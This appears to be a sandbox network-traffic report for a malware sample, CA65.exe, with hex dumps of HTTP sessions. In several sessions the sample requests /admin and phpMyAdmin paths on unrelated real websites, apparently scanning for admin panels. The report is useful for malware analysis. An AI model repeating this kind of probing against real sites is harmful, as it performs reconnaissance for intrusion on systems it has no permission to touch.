Ascii: -fixed #Action_bar,.header-plain #Action_bar,.header-split #Action_bar,.header-shop #Action_bar,.header-shop-split #Action_bar,.header-stack #Action_bar{background-color:#2C2C2C}#Sliding-top{background-color:#f3f3f3}#Sliding-top a.sliding-top-control{bord
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 39 64 63 62 0d 0a 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 20 2e 64 65 73 63 2c 2e 69 63 6f 6e 5f 62 6f 78 20 61 3a 68 6f 76 65 72 20 2e 64 65 73 63 2c 2e 66 65 61 74 75 72 65 5f 6c 69 73 74 20 75 6c 20 6c 69 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 2c 2e 6c 69 73 74 5f 69 74 65 6d 20 61 3a 68 6f 76 65 72 2c 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 2c 2e 66 6c 61 74 5f 62 6f 78 20 61 3a 68 6f 76 65 72 2c 2e 73 74 6f 72 79 5f 62 6f 78 20 2e 64 65 73 63 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 63 61 72 6f 75 73 65 6c 20 20 75 6c 20 6c 69 20 61 20 2e 74 69 74 6c 65 2c 2e 63 6f 6e 74 65 6e 74 5f 73 6c 69 64 65 72 2e 66 6c Data Ascii: 9dcb.timeline_items,.icon_box a .desc,.icon_box a:hover .desc,.feature_list ul li a,.list_item a,.list_item a:hover,.widget_recent_entries ul li a,.flat_box a,.flat_box a:hover,.story_box .desc,.content_slider.carousel ul li a .title,.content_slider.fl
2023-12-22 20:15:08 UTC	16384	IN	Data Raw: 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 3a 61 66 74 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 6d 66 6e 5f 6d 65 6e 75 20 75 6c 20 6c 69 20 61 3a 68 6f 76 65 72 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 70 72 6f 64 75 63 74 5f 63 61 74 65 67 6f 72 69 65 73 20 75 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 61 32 63 32 65 7d 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 52 65 63 65 6e 74 5f 70 6f 73 74 73 20 75 6c 20 6c 69 20 61 20 2e 64 65 73 63 20 2e 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 77 69 64 67 65 74 5f 72 65 63 65 6e 74 5f 65 6e 74 72 69 65 73 20 75 6c 20 6c 69 20 2e 70 6f 73 74 2d 64 61 74 65 2c 2e 6d 66 6e 2d 66 6f 6f 74 65 72 20 2e 74 70 5f 72 65 63 65 6e 74 5f 74 Data Ascii: nt_entries ul li:after,.mfn-footer .widget_mfn_menu ul li a:hover,.mfn-footer .widget_product_categories ul{background-color:#2a2c2e}.mfn-footer .Recent_posts ul li a .desc .date,.mfn-footer .widget_recent_entries ul li .post-date,.mfn-footer .tp_recent_t
2023-12-22 20:15:08 UTC	7640	IN	Data Raw: 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 57 3b 0a 09 09 09 09 77 69 6e 64 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 0a 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0a 09 09 09 09 09 09 6e 65 77 68 3b 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 7c 7c 20 28 65 2e 6c 3d 3d 22 66 75 6c 6c 77 69 64 Data Ascii: fined ? window.innerWidth : window.RSIW;window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 \|\| isNaN(pw) \|\| (e.l=="fullwid

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
244	192.168.2.4	51023	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	203	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	802	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:07 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:07 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gtvDW2fSHzQO8%2Fy3CzXPpHuDc%2F%2Fv6yOVXwUA%2BPXw%2FZyNEr0qD0FV1Yaj6HzbdJMWkLismmKlXkC4oNqt7T5YGXhfaWUBoCX1DlHbWlxoGhUVJ0JurIx2j7iPzNr%2F6u5T7ykkbY0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f66d120a2a-MIA
2023-12-22 20:15:07 UTC	567	IN	Data Raw: 37 63 38 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 Data Ascii: 7c80<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 Data Ascii: css" /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.c
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 Data Ascii: t" href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date()
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 22 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 65 61 64 65 72 4d 6f 62 69 6c 65 53 65 61 72 63 68 4d 61 67 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 6f 78 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 6f 78 44 69 76 49 44 22 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 73 65 61 72 63 68 2e 63 66 6d 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 69 64 3d 22 73 69 74 65 48 65 61 64 65 72 46 6f 72 6d 53 65 61 72 63 68 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 Data Ascii: "0" onclick="headerMobileSearchMagFunc(); return false;"></div><div class="search-box " id="hdv3HeaderSearchBoxDivID"><form action="https://www.HugeDomains.com/domain_search.cfm" method="get" class="search-form" id="siteHeaderFormSearchID"><input typ
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 68 64 76 33 2d 69 6d 67 2f 70 68 6f 6e 65 2d 69 63 6f 6e 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 6c 6c 2d 74 65 78 74 22 3e 2b 31 2d 33 30 33 2d 38 39 33 2d 30 35 35 32 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 68 51 51 51 69 64 65 41 74 39 39 31 57 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 44 72 61 77 65 72 4c 61 79 20 22 20 6f 6e 63 6c 69 63 6b 3d 22 20 24 28 20 27 23 6e 61 76 54 6f 67 67 6c 65 27 20 29 2e 63 6c 69 63 6b 28 29 3b 20 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 Data Ascii: hdv3-img/phone-icon.png" alt><span class="tell-text">+1-303-893-0552</span></a></div></div></div><nav class="navbar hQQQideAt991Width"><div class="overDrawerLay " onclick=" $( '#navToggle' ).click(); "></div><div class="overlay "><div class="overla
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e 67 22 20 61 6c 74 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 61 72 74 2d 6e 75 6d 62 Data Ascii: .HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.png" alt><span class="cart-numb
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 33 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 34 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 35 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 36 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 37 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 Data Ascii: class="circularJ"><div class="circularJ_1"></div><div class="circularJ_2"></div><div class="circularJ_3"></div><div class="circularJ_4"></div><div class="circularJ_5"></div><div class="circularJ_6"></div><div class="circularJ_7"></div><div class="
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 3e 53 65 65 20 64 65 74 61 69 6c 73 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 72 65 64 69 74 69 20 22 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 33 30 64 61 79 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 33 30 2d 64 61 79 20 6d 6f 6e 65 79 20 62 61 63 6b 20 67 75 61 72 61 6e 74 65 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: >See details</a></div><div class="crediti "><ul><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/30daysmallico.png" alt></div><div class="content"><span>30-day money back guarantee</span></div></li><li><div class=
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 43 68 65 6d 2e 63 6f 6d 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 2d 74 2d 6e 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 73 61 6c 65 3a 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 34 39 35 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 73 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 42 75 79 20 6e 6f 77 20 66 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 34 2c 34 39 35 3c 2f 73 70 61 6e 3e 20 6f 72 20 70 61 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 72 65 65 6e 22 3e 24 31 38 37 2e 32 39 3c 2f 73 70 61 6e 3e 20 70 65 72 20 6d 6f 6e 74 68 20 66 6f 72 Data Ascii: Chem.com</h1><p class="d-t-n">This domain is for sale: <span class="green">$4,495</span></p></div><div class="tablet-block-s"><p class="text-center">Buy now for <span class="green">$4,495</span> or pay <span class="green">$187.29</span> per month for
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 22 3e 0a 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 22 3e 6f 72 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 65 74 2d 62 6c 6f 63 6b 2d 72 69 67 68 74 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 70 61 79 6d 65 6e 74 2d 70 6c 61 6e 2d 73 65 74 75 70 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 34 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 Data Ascii: bottom:25px;"><span style="font-size:16px;">or</span></div><div class="tablet-block-right"><a href="https://www.HugeDomains.com/payment-plan-setup.cfm?d=YuejiChem.com" class="btn" style="padding-right:30px; width:247px; min-width:247px; margin-top:10p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
245	192.168.2.4	51050	34.136.28.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	170	OUT	GET /admin HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPofqzNtF5Ty6nh1bUso3TzfIwy8wENQIL_R998SE5gKYmD5LkcZx8gBoM2N6fyf2Ut3bj8yKIj1tw date: Fri, 22 Dec 2023 20:15:07 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:15:07 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:07 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
246	192.168.2.4	51091	104.21.52.80	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	175	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	981	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://cannaclear.com CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding x-redirect-by: Rank Math Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U2fK9uxGwsr1w2%2BYrfjGAa6dVwndS%2BpBteVdHdNm519S8WYb8S1PVkpiYzxU2QxJKE%2BY4a7GsLugq5eh%2FOBhSZthgCi6irbIG1XMY20ycsyEardUihC2m%2FbzqAcc9J3d4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08f6eb203360-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
247	192.168.2.4	51086	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	175	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	629	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/phpMyAdmin/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ykk4RCnBqZI%2BrkxEmeDtVrrLXnoYs%2FGG9Vo2O5rsBEMshG0hWO1LSOKWeoCQp12a81HrfbyHVr8cLMSzI%2F%2FuJxqR6ckvaJi8k8gk4iWizGSvYiPQ21%2BX5dbJQWueeSbO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f6e864742c-MIA
2023-12-22 20:15:07 UTC	252	IN	Data Raw: 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f6<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/phpMyAdmin/">here</a>.</p></body></html>
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
248	192.168.2.4	51083	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	179	OUT	GET /admin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	921	IN	HTTP/1.1 404 Not Found Content-Length: 2929 Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276107.453170988273848858 Cache-Control: public,max-age=0,must-revalidate Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:07 GMT Age: 5 X-Served-By: cache-dfw-kdfw8210043-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_g X-Seen-By: 